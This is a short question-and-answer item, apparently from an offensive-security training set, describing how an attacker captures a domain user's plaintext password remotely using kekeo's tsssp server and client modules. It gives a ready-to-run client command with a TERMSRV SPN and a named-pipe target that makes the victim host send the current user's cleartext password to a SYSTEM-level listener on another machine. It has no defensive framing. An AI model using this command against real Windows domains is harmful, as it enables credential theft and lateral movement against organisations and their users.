How can an attacker remotely capture plaintext passwords from another host in a domain environment using this technique?
In a domain environment using Kerberos, the attacker sets up a `tsssp::server` on a remote machine with SYSTEM privileges. Then, from the target host (as a regular user), they run `tsssp::client /target:TERMSRV/COMPUTER01.test.com /pipe:\\COMPUTER01.test.com\pipe\kekeo_tsssp_endpoint` to connect to that remote server. This causes the target host to send its current user's plaintext password over the network. The SPN used corresponds to the domain computer account. For more details, refer to the exploitation section of the article.